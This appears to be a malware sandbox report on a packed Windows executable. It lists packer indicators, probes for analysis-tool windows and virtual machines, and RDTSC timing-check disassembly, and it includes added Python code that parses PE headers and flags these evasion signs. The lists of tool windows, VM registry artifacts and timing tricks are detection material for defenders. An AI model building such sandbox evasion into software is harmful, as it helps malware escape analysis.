Source: C:\Users\user\Desktop\random.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\random.exe | Section loaded: version.dll
Source: random.exe | Static file information: File size 1872896 > 1048576
Source: random.exe | Static PE information: Raw size of zqekczog is bigger than: 0x100000 < 0x197400

      Data Obfuscation

      Source: C:\Users\user\Desktop\random.exe | Unpacked PE file: 0.2.random.exe.e80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zqekczog:EW;annrbsan:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zqekczog:EW;annrbsan:EW;.taggant:EW; (section rights of the unpacked image vs. the original file; the unnamed first section changes from execute/read on disk to execute/write in memory)
      Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
      Source: random.exe | Static PE information: real checksum: 0x1cdf16 should be: 0x1cba0d
      Source: random.exe | Static PE information: section name: (blank or non-printable)
      Source: random.exe | Static PE information: section name: .idata
      Source: random.exe | Static PE information: section name: (blank or non-printable)
      Source: random.exe | Static PE information: section name: zqekczog
      Source: random.exe | Static PE information: section name: annrbsan
      Source: random.exe | Static PE information: section name: .taggant
      Source: random.exe | Static PE information: section name: (blank or non-printable) entropy: 7.97933591893857
      Source: random.exe | Static PE information: section name: zqekczog entropy: 7.95352697603957
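The static indicators above (blank section names, section entropy close to 8, an entry point in .taggant rather than .text, sections mapped writable and executable, a CheckSum that does not match the file) can be reproduced on any PE with a few dozen lines. The following added example is not Joe Sandbox code: it parses the section table and recomputes the PE checksum with the standard library only. Its input is a constructed PE32 built inline by the `build_pe` and `sample_image` helpers (the section layout and the wrong 0x1234 checksum are illustrative assumptions), not random.exe itself.

```python
"""Static PE triage for packer indicators: blank or non-standard section names,
entropy near 8, entry point outside .text, writable+executable sections and a
CheckSum mismatch. Added example; input is a constructed PE32, not the sample."""
import random
import struct
from collections import Counter
from math import log2

SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".tls"}
HIGH_ENTROPY = 7.5  # bits per byte; ordinary x86 code sits around 6

def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (8.0 means uniformly random)."""
    n = len(data) or 1
    return -sum(c / n * log2(c / n) for c in Counter(data).values())

def pe_checksum(image: bytes, checksum_offset: int) -> int:
    """CheckSum as CheckSumMappedFile computes it: ones' complement sum of the
    32-bit words (skipping the CheckSum field), folded to 16 bits, plus file size."""
    data = image + b"\0" * (-len(image) % 4)
    total = 0
    for off in range(0, len(data), 4):
        if off != checksum_offset:
            total += struct.unpack_from("<I", data, off)[0]
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return (total + len(image)) & 0xFFFFFFFF

def parse_pe(image: bytes) -> dict:
    """Pull entry point, CheckSum and the section table out of a PE image."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    opt = e_lfanew + 24                      # IMAGE_OPTIONAL_HEADER
    sections = []
    for i in range(nsec):
        base = opt + opt_size + 40 * i       # IMAGE_SECTION_HEADER is 40 bytes
        raw_name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", image, base)
        sections.append({"name": raw_name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "data": image[rawptr:rawptr + rawsize],
                         "chars": struct.unpack_from("<I", image, base + 36)[0]})
    return {"entry": struct.unpack_from("<I", image, opt + 16)[0],
            "checksum_offset": opt + 64,
            "checksum": struct.unpack_from("<I", image, opt + 64)[0],
            "sections": sections}

def triage(image: bytes) -> list:
    """Return the packer indicators found in the image as short strings."""
    pe = parse_pe(image)
    findings = []
    ep = next((s for s in pe["sections"]
               if s["va"] <= pe["entry"] < s["va"] + max(s["vsize"], len(s["data"]))), None)
    if ep is None:
        findings.append("entry point outside every section")
    elif ep["name"] != ".text":
        findings.append(f"entry point in section {ep['name']!r}")
    for s in pe["sections"]:
        label, ent = repr(s["name"]), entropy(s["data"])
        if not s["name"] or not s["name"].isprintable():
            findings.append(f"section {label}: blank or non-printable name")
        elif s["name"] not in STANDARD_SECTIONS:
            findings.append(f"section {label}: non-standard name")
        if ent > HIGH_ENTROPY:
            findings.append(f"section {label}: entropy {ent:.2f} (packed or encrypted)")
        if s["chars"] & SCN_WRITE and s["chars"] & SCN_EXECUTE:
            findings.append(f"section {label}: writable and executable")
    real = pe_checksum(image, pe["checksum_offset"])
    if pe["checksum"] and pe["checksum"] != real:   # 0 means "not set", not a mismatch
        findings.append(f"checksum 0x{pe['checksum']:x} should be 0x{real:x}")
    return findings

def build_pe(sections, entry_rva: int, checksum: int = 0) -> bytes:
    """Constructed minimal PE32 (DOS header, PE header, section table, raw data).
    sections: [(name_bytes, virtual_address, data, characteristics), ...]"""
    e_lfanew, opt_size, align = 0x40, 0xE0, 0x200
    ptr = -(-(e_lfanew + 24 + opt_size + 40 * len(sections)) // align) * align
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)   # AddressOfEntryPoint
    struct.pack_into("<I", opt, 64, checksum)    # CheckSum
    table, body = b"", b""
    for name, va, data, chars in sections:
        padded = data + b"\0" * (-len(data) % align)
        table += struct.pack("<8sIIIIIIHHI", name, len(data), va, len(padded),
                             ptr + len(body), 0, 0, 0, 0, chars)
        body += padded
    header = dos + coff + bytes(opt) + table
    return header + b"\0" * (ptr - len(header)) + body

def sample_image(checksum: int = 0x1234) -> bytes:
    """Constructed image echoing the report: a blank-name section and a
    'zqekczog' section of high-entropy bytes, both RWX, the entry point in an
    RWX '.taggant' section, and a deliberately wrong CheckSum (assumption)."""
    rnd = random.Random(1)
    noise = lambda: bytes(rnd.getrandbits(8) for _ in range(4096))
    rwx = SCN_READ | SCN_WRITE | SCN_EXECUTE
    return build_pe([(b".text", 0x1000, b"\x55\x8b\xec" * 600, SCN_READ | SCN_EXECUTE),
                     (b"", 0x2000, noise(), rwx),
                     (b"zqekczog", 0x4000, noise(), rwx),
                     (b".taggant", 0x6000, b"\x60\x90" * 64, rwx)],
                    entry_rva=0x6000, checksum=checksum)
```

Running `triage(sample_image())` lists the same five kinds of finding the report shows for this sample; running it on a file whose header CheckSum equals `pe_checksum()` produces no checksum line, which is the round trip the report's "real checksum ... should be" line fails. A CheckSum of 0 is treated as unset rather than wrong, because many legitimately unsigned binaries ship that way.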

      Boot Survival

      Source: C:\Users\user\Desktop\random.exe | Window searched: window name: FilemonClass
      Source: C:\Users\user\Desktop\random.exe | Window searched: window name: PROCMON_WINDOW_CLASS
      Source: C:\Users\user\Desktop\random.exe | Window searched: window name: RegmonClass
      Source: C:\Users\user\Desktop\random.exe | Window searched: window name: FilemonClass
      Source: C:\Users\user\Desktop\random.exe | Window searched: window name: PROCMON_WINDOW_CLASS
      Source: C:\Users\user\Desktop\random.exe | Window searched: window name: Regmonclass
      Source: C:\Users\user\Desktop\random.exe | Window searched: window name: Filemonclass
      Source: C:\Users\user\Desktop\random.exe | Window searched: window name: PROCMON_WINDOW_CLASS
      Source: C:\Users\user\Desktop\random.exe | Window searched: window name: Regmonclass
      Source: C:\Users\user\Desktop\random.exe | Process information set: NOOPENFILEERRORBOX
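The window-class lookups above (Process Monitor, Filemon, Regmon, probed with both casings) are FindWindow-style checks for analysis tools; the registry, WMI and firmware-table records listed in the next section are the matching checks for a hypervisor. The following added example, which is not the report's own tooling, runs detection logic over behaviour records written in this report's format and groups them into indicator categories. The records are copied from this report, except the final CurrentVersion key, which is a constructed benign control. The OllyDbg and WinDbg window classes and the VMware Tools, Guest Additions and FADT registry markers extend the lists beyond what this sample probed.

```python
"""Classify Joe Sandbox style behaviour records into anti-analysis indicator
groups. Added example, not part of the report or of Joe Sandbox."""
import re
from collections import defaultdict

# Main-window classes of analysis tools, looked up with FindWindow. The three
# classes this sample probed, plus OllyDbg and WinDbg as an extension.
TOOL_WINDOW_CLASSES = {
    "procmon_window_class": "Process Monitor",
    "filemonclass": "Filemon",
    "regmonclass": "Regmon",
    "ollydbg": "OllyDbg",
    "windbgframeclass": "WinDbg",
}
# Registry paths that only exist under a hypervisor or Wine (case-insensitive
# substrings). The VBOX__ DSDT key and Software\Wine are the ones this sample
# opened; the others are well-known equivalents added for coverage.
VM_REGISTRY_MARKERS = {
    r"hardware\acpi\dsdt\vbox__": "VirtualBox ACPI DSDT table",
    r"hardware\acpi\fadt\vbox__": "VirtualBox ACPI FADT table",
    r"software\wine": "Wine",
    r"software\vmware, inc.\vmware tools": "VMware Tools",
    r"software\oracle\virtualbox guest additions": "VirtualBox Guest Additions",
}
# WMI classes whose Name/Manufacturer strings reveal a virtual machine.
FINGERPRINT_WMI_CLASSES = {"win32_videocontroller", "win32_computersystem",
                           "win32_bios", "win32_diskdrive"}
RECORD = re.compile(r"^(?P<kind>[^:]+): (?P<detail>.+)$")
NOISE = "error dialog suppression (SetErrorMode)"   # noted, but not an evasion category

def classify(line: str):
    """Map one record to (indicator category, detail), or None if it is benign."""
    m = RECORD.match(line.strip())
    if not m:
        return None
    kind, detail = m["kind"], m["detail"]
    low = detail.lower()
    if kind == "Window searched":
        tool = TOOL_WINDOW_CLASSES.get(detail.split("window name: ", 1)[-1].lower())
        return ("analysis-tool window probe", tool) if tool else None
    if kind == "File opened":
        for marker, what in VM_REGISTRY_MARKERS.items():
            if marker in low:
                return ("hypervisor registry artifact", what)
    if kind == "WMI Queries":
        cls = re.search(r"\bfrom\s+(\w+)", low)
        if cls and cls[1] in FINGERPRINT_WMI_CLASSES:
            return ("hardware fingerprint via WMI", cls[1])
    if kind == "System information queried" and "firmwaretableinformation" in low:
        return ("firmware table read (SMBIOS/ACPI vendor strings)", detail)
    if kind == "Process information set" and "noopenfileerrorbox" in low:
        return (NOISE, detail)
    return None

def evaluate(records: str) -> dict:
    """Aggregate all records; two or more distinct evasion categories give the verdict."""
    hits = defaultdict(set)
    for line in records.splitlines():
        hit = classify(line)
        if hit:
            hits[hit[0]].add(hit[1])
    evasion = [k for k in hits if k != NOISE]
    return {"indicators": {k: sorted(v) for k, v in hits.items()},
            "evasion_categories": len(evasion),
            "verdict": "sandbox/VM evasion" if len(evasion) >= 2 else "inconclusive"}

# Records copied from this report, plus one constructed benign key as a control.
RECORDS = r"""
Window searched: window name: FilemonClass
Window searched: window name: PROCMON_WINDOW_CLASS
Window searched: window name: Regmonclass
Process information set: NOOPENFILEERRORBOX
WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
System information queried: FirmwareTableInformation
File opened: HKEY_CURRENT_USER\Software\Wine
File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
File opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
"""

if __name__ == "__main__":
    print(evaluate(RECORDS))
```

`evaluate(RECORDS)` reports four distinct evasion categories for this sample's records and ignores the CurrentVersion control. The NOOPENFILEERRORBOX record is kept as a separate, non-scoring note: SetErrorMode only stops Windows from popping a dialog when a missing DLL or bad handle is encountered, which a packer uses to fail silently rather than to detect analysis.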

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\random.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\Desktop\random.exe | System information queried: FirmwareTableInformation
      Source: C:\Users\user\Desktop\random.exe | File opened: HKEY_CURRENT_USER\Software\Wine
      Source: C:\Users\user\Desktop\random.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
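The RDTSC interceptor records that follow each describe one pair of rdtsc reads and the instructions executed between them; where one record's second address is the next record's first address, the sample is reading the time stamp counter over and over in a chain. The added example below is not Joe Sandbox code: it parses that record format, links records into chains and measures how much of the code between reads is stack-neutral filler (push/pop, pushad/popad, nops, flag instructions and jumps) versus real work. The five records are copied from this report; the filler mnemonic list is an assumption of the example.

```python
"""Parse Joe Sandbox "RDTSC instruction interceptor" records, chain them and
measure how much real code sits between consecutive rdtsc reads. Added example,
not Joe Sandbox code; the five records are copied from this report."""
import re

RECORDS = [
    "First address: EE6011 second address: EE6017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc",
    "First address: EE58CD second address: EE58E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA8D8E1DD00h 0x0000000c rdtsc",
    "First address: EE58E4 second address: EE58E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc",
    "First address: EE58E8 second address: EE5902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 ja 00007FA8D8E1DCF8h 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 jng 00007FA8D8E1DCF6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc",
    "First address: 105E285 second address: 105E2E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1199B93Dh 0x00000010 mov dword ptr [ebp+122D2AFFh], ebx 0x00000016 lea ebx, dword ptr [ebp+1244C0D1h] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FA8D8E1DCF8h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 or edi, dword ptr [ebp+122D34A1h] 0x0000003c push eax 0x0000003d pushad 0x0000003e je 00007FA8D8E1DCFCh 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc",
]

HEADER = re.compile(r"First address: (?P<first>[0-9A-F]+) second address: "
                    r"(?P<second>[0-9A-F]+) instructions: (?P<body>.+)")
OFFSET = re.compile(r"\s*0x[0-9a-f]{8}\s+")   # "0x0000001a " precedes every instruction
# Mnemonics that neither use the time stamp nor do useful work (assumption of
# this example); every j* mnemonic (jmp and conditional jumps) counts as filler too.
FILLER = {"push", "pop", "pushad", "popad", "nop", "clc", "stc", "cmc"}

def parse_record(text: str) -> dict:
    """Split one record into its two rdtsc sites and the instructions between them."""
    m = HEADER.match(text)
    if not m:
        raise ValueError("not an RDTSC interceptor record")
    instrs = [i for i in OFFSET.split(m["body"]) if i]
    if instrs[0] != "rdtsc" or instrs[-1] != "rdtsc":
        raise ValueError("record must start and end with rdtsc")
    between = instrs[1:-1]
    real = [i for i in between
            if not (i.split()[0] in FILLER or i.split()[0].startswith("j"))]
    return {"first": m["first"], "second": m["second"],
            "between": len(between), "real": real}

def chains(records) -> list:
    """Merge records into chains: a record continues a chain when its first
    rdtsc site is the previous record's second site."""
    out = []
    for rec in map(parse_record, records):
        if out and out[-1]["sites"][-1] == rec["first"]:
            out[-1]["sites"].append(rec["second"])
            out[-1]["between"] += rec["between"]
            out[-1]["real"] += rec["real"]
        else:
            out.append({"sites": [rec["first"], rec["second"]],
                        "between": rec["between"], "real": list(rec["real"])})
    return out

def summarize(records) -> dict:
    """Chain count, longest chain (in rdtsc reads) and the filler share overall."""
    cs = chains(records)
    between = sum(c["between"] for c in cs)
    real = sum(len(c["real"]) for c in cs)
    return {"records": len(records), "chains": len(cs),
            "longest_chain_reads": max(len(c["sites"]) for c in cs),
            "real_instructions": real,
            "filler_ratio": 1 - real / between if between else 0.0}

if __name__ == "__main__":
    for c in chains(RECORDS):
        print(" -> ".join(c["sites"]), f"{c['between']} instr, real: {c['real'] or 'none'}")
    print(summarize(RECORDS))
```

For these five records the chain EE58CD -> EE58E4 -> EE58E8 -> EE5902 contains four reads with nothing but filler between them, while the 105E285 record wraps ten real instructions (including a call and two ret-based jumps) in the same kind of padding. On bare metal two reads separated only by filler differ by a few dozen cycles; under a hypervisor that traps RDTSC, a single-stepping debugger or an API hook that fires inside the chain, the difference grows by orders of magnitude, which is the signal the packer looks for. The threshold the sample applies is not visible in the report.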
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: EE6011 second address: EE6017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: EE6017 second address: EE58CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA8D8E164B5h 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d mov ebx, 5AB8C46Bh 0x00000012 jmp 00007FA8D8E164B8h 0x00000017 popad 0x00000018 push dword ptr [ebp+122D05A5h] 0x0000001e cmc 0x0000001f xor dword ptr [ebp+122D1EF6h], edi 0x00000025 call dword ptr [ebp+122D1FBEh] 0x0000002b pushad 0x0000002c jmp 00007FA8D8E164ABh 0x00000031 xor eax, eax 0x00000033 add dword ptr [ebp+122D1B6Fh], edx 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d js 00007FA8D8E164ACh 0x00000043 add dword ptr [ebp+122D2B2Dh], eax 0x00000049 mov dword ptr [ebp+122D3679h], eax 0x0000004f mov dword ptr [ebp+122D1913h], eax 0x00000055 mov esi, 0000003Ch 0x0000005a pushad 0x0000005b movzx ebx, cx 0x0000005e and eax, dword ptr [ebp+122D3659h] 0x00000064 popad 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 jmp 00007FA8D8E164B8h 0x0000006e lodsw 0x00000070 jmp 00007FA8D8E164AFh 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 sub dword ptr [ebp+122D201Dh], esi 0x0000007f sub dword ptr [ebp+122D2B2Dh], ecx 0x00000085 mov ebx, dword ptr [esp+24h] 0x00000089 stc 0x0000008a nop 0x0000008b pushad 0x0000008c pushad 0x0000008d pushad 0x0000008e popad 0x0000008f push eax 0x00000090 push edx 0x00000091 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: EE58CD second address: EE58E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA8D8E1DD00h 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: EE58E4 second address: EE58E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: EE58E8 second address: EE5902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 ja 00007FA8D8E1DCF8h 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 jng 00007FA8D8E1DCF6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105D029 second address: 105D02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105D02D second address: 105D047 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD06h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105C200 second address: 105C207 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105C207 second address: 105C210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105C210 second address: 105C214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105C368 second address: 105C38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA8D8E1DD00h 0x0000000b jnp 00007FA8D8E1DCF6h 0x00000011 popad 0x00000012 push ecx 0x00000013 jnc 00007FA8D8E1DCF6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105C4E6 second address: 105C4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105C4EC second address: 105C4FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FA8D8E1DD0Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105C4FC second address: 105C500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105C7C7 second address: 105C7CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105C90C second address: 105C929 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA8D8E164A6h 0x00000008 jmp 00007FA8D8E164B3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105E285 second address: 105E2E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1199B93Dh 0x00000010 mov dword ptr [ebp+122D2AFFh], ebx 0x00000016 lea ebx, dword ptr [ebp+1244C0D1h] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FA8D8E1DCF8h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 or edi, dword ptr [ebp+122D34A1h] 0x0000003c push eax 0x0000003d pushad 0x0000003e je 00007FA8D8E1DCFCh 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105E2E2 second address: 105E2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FA8D8E164B4h 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105E367 second address: 105E3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA8D8E1DCF6h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FA8D8E1DCF8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 stc 0x00000028 push 00000000h 0x0000002a jmp 00007FA8D8E1DCFDh 0x0000002f push D0F41FD6h 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105E3AD second address: 105E3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164B1h 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105E3C3 second address: 105E442 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2F0BE0AAh 0x00000010 mov dword ptr [ebp+122D19F8h], eax 0x00000016 mov dword ptr [ebp+122D287Eh], ebx 0x0000001c push 00000003h 0x0000001e call 00007FA8D8E1DCFBh 0x00000023 clc 0x00000024 pop edx 0x00000025 push 00000000h 0x00000027 mov cl, 2Fh 0x00000029 push 00000003h 0x0000002b call 00007FA8D8E1DD01h 0x00000030 jnc 00007FA8D8E1DCFCh 0x00000036 pop esi 0x00000037 call 00007FA8D8E1DCF9h 0x0000003c push eax 0x0000003d push edx 0x0000003e push ebx 0x0000003f jmp 00007FA8D8E1DD05h 0x00000044 pop ebx 0x00000045 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105E442 second address: 105E4E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FA8D8E164A6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jg 00007FA8D8E164B0h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jnl 00007FA8D8E164B8h 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 push eax 0x00000023 pushad 0x00000024 popad 0x00000025 pop eax 0x00000026 push eax 0x00000027 jc 00007FA8D8E164A6h 0x0000002d pop eax 0x0000002e popad 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 jmp 00007FA8D8E164ADh 0x00000038 pop eax 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007FA8D8E164A8h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 mov dword ptr [ebp+122D1FA7h], ebx 0x00000059 mov ecx, dword ptr [ebp+122D37E5h] 0x0000005f lea ebx, dword ptr [ebp+1244C0DAh] 0x00000065 mov edi, 77043047h 0x0000006a xchg eax, ebx 0x0000006b jbe 00007FA8D8E164B4h 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 popad 0x00000075 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105E4E5 second address: 105E4E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 105E56F second address: 105E5C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FA8D8E164A8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov ecx, dword ptr [ebp+122D1F1Dh] 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d mov dh, DCh 0x0000002f pop ecx 0x00000030 push B4297ECEh 0x00000035 jl 00007FA8D8E164C6h 0x0000003b push eax 0x0000003c push edx 0x0000003d jng 00007FA8D8E164A6h 0x00000043 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 10446CC second address: 10446D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
